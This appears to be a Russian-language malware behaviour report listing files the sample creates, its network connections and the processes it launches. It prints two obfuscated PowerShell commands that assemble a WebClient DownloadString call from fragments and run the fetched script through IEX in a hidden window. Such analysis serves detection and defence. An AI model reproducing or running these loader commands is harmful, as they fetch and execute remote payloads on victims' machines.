Техническая информация
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\outofprocreport946662.txt
- %TEMP%\outofprocreport946581.txt
Сетевая активность
Подключается к
- '92.##5.57.155':80
TCP
Запросы HTTP GET
- http://92.##5.57.155/a.jpg
- http://92.##5.57.155/b.jpg
Другое
Запускает на исполнение
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $F5='ject Net.WebCli';$F8='loadString(''http://92.##5.57.155/a.jpg'')';$F4='ent).Down';$F1='(New-Ob';$TC=I`E`X ($F1,$F5,$F4,$F8 -Join '')|I`E`X (со скрытым окном)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' $F5='ject Net.WebCli';$F8='loadString(''http://92.##5.57.155/b.jpg'')';$F4='ent).Down';$F1='(New-Ob';$TC=I`E`X ($F1,$F5,$F4,$F8 -Join '')|I`E`X (со скрытым окном)
- '%WINDIR%\syswow64\wermgr.exe' "-outproc" "1932" "912"
- '%WINDIR%\syswow64\wermgr.exe' "-outproc" "1052" "884"
